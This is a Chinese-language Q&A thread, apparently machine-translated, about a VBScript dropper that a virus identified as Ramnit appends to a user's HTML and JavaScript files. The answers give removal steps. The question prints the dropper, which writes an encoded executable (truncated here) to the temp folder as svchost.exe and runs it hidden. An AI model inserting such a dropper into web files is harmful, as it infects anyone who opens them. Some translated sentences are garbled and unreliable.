每当我在Notepad ++中打开JavaScript(.js)或HTML(.html)文件几天后,最后会自动添加类似的VB脚本。我强烈认为这是某种病毒,有人可以指导我吗?
</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- .... {Lots of junk characters here } -->
答案 0 :(得分:2)
我还认为您的系统已经受到一些病毒的影响。我想分享一个我遇到过的与您的问题相符的链接,请点击此处,我将发布链接 - &gt; http://www.webdeveloper.com/forum/showthread.php?287131-VBScript-gets-inserted-automatically-in-HTML-page
答案 1 :(得分:2)
它运行的文件是%temp%\ svchost.exe。
因此,请执行任务列表
tasklist /svc /fi "imagename eq svchost.exe"
记下没有任何包含服务的svchost。将实际PID输入xxxx
taskkill /pid xxxx /pid xxxx /pid xxxx /f
这将阻止该特定部分的运行。
该病毒所使用的技术在非英语窗口中尤其可靠,无法正常工作。
此外,不是删除它而是更改安全性以防止执行,直到您清理可能存在的其他部分。
icacls "%temp%\svchost.exe" /deny Everyone:F
这适用于Vista,但广泛适用于所有版本。
病毒清除
如果在正常模式下执行此操作时遇到问题。尝试在网络安全模式下进行。
单击开始 - 所有程序 - 附件 - 运行并键入
msconfig
然后转到Boot选项卡并单击Safe Boot并勾选Network。重启。回到这里取消安全启动以恢复正常模式。
安全扫描程序
Microsoft Safety Scanner是一款免费下载的安全工具,可提供按需扫描并帮助删除病毒,间谍软件和其他恶意软件。它适用于您现有的防病毒软件。
http://www.microsoft.com/security/scanner/en-au/default.aspx
恶意软件删除工具
如果您无法下载或运行安全扫描程序,Windows内置了一个小型防病毒程序。它只针对最常见的威胁。它会想要更新,不要让它。运行它而不更新。然后再次运行它,这次更新。
单击开始 - 所有程序 - 附件 - 运行(或按Winkey + R)。型
mrt
重置防火墙
您可以将防火墙重置为默认设置。
开始 - 所有程序 - 附件 - 右键单击“命令提示符”,然后选择“以管理员身份运行”。键入(或通过右键单击“命令提示符”窗口并选择“粘贴”进行复制和粘贴)。
netsh advfirewall reset export "%userprofile%\desktop\Firewall Settings.wfw"
安全修正
Fixits是Microsoft的故障排除程序。其中有27个。
自动修复Windows安全设置以确保您的PC安全
http://support.microsoft.com/mats/Malware_Prevention/en-us
和
修复安全问题以自动保护和保护Windows
http://support.microsoft.com/mats/windows_security_diagnostic/en-us
和
修复Internet Explorer问题,使IE快速,安全,稳定
http://support.microsoft.com/mats/ie_performance_and_safety/en-us
有关完整列表,请访问
http://support.microsoft.com/fixit/en-us
当您选择下载它时,请选择在另一台计算机上运行的选项。然后,您可以将其保存到文件夹中的硬盘上。打开文件夹,打开文件夹Fix it Portable,然后运行Launch Fix It。它将包含所有27个Fixits。
全职防病毒
对于永久性反病毒,我们在论坛中发现使用Microsoft Security Essentials的用户完全没有问题。
http://www.microsoft.com/en-au/download/details.aspx?id=5201
如果All Else失败
这个来自Microsoft的程序启动另一个基本操作系统来清理Windows。您需要将其放在USB或DVD上,然后从它启动。
http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline
在威胁中查找详细信息
Microsoft维护着一份病毒信息百科全书。
http://www.microsoft.com/security/portal/threat/threats.aspx
答案 2 :(得分:1)
我认为这是一种病毒。
因此,如果您没有防病毒软件,则需要安装防病毒软件。
我建议免费:Microsoft Security Essentials或Avast。
此外,您可以下载特殊的防病毒实用程序,仅用于扫描而不是安装它 - Dr. Web CureIt!
然后对您的计算机进行全面扫描。
您应该检查所有启动命令并删除所有恶意命令。例如CCleaner Free可以帮助您检查它们。
<强> UPD
清理并删除启动命令后,您可以使用sfc实用程序。
Microsoft Windows资源检查器
扫描所有受保护系统文件的完整性,并使用正确的Microsoft版本替换不正确的版本。
使用管理员权限运行cmd,然后运行sfc /scannow命令。
答案 3 :(得分:0)
这是一种名为Win32.Ramnit的病毒 阅读这里的描述:
我刚刚在我的一台客户端计算机上发现了这种病毒,这种病毒修改了我的USB便携式硬盘中的所有html文件。
此脚本执行VBScript以创建文件并执行它并在此文件夹中安装程序:
css了解详情:http://greatis.com/blog/how-to-remove-malware/desktoplayer-exe-virus-ramnit.htm
对于您插入此受感染PC的每个USB pendrive,该病毒将创建2个文件:
C:\Program Files\Microsoft\DesktopLayer.exe
autorun.inf的内容:
autorun.inf
\RECYCLER\<random GUID>\<random charx8>.exe
将此pendrive插入另一台计算机时,尝试执行病毒安装程序。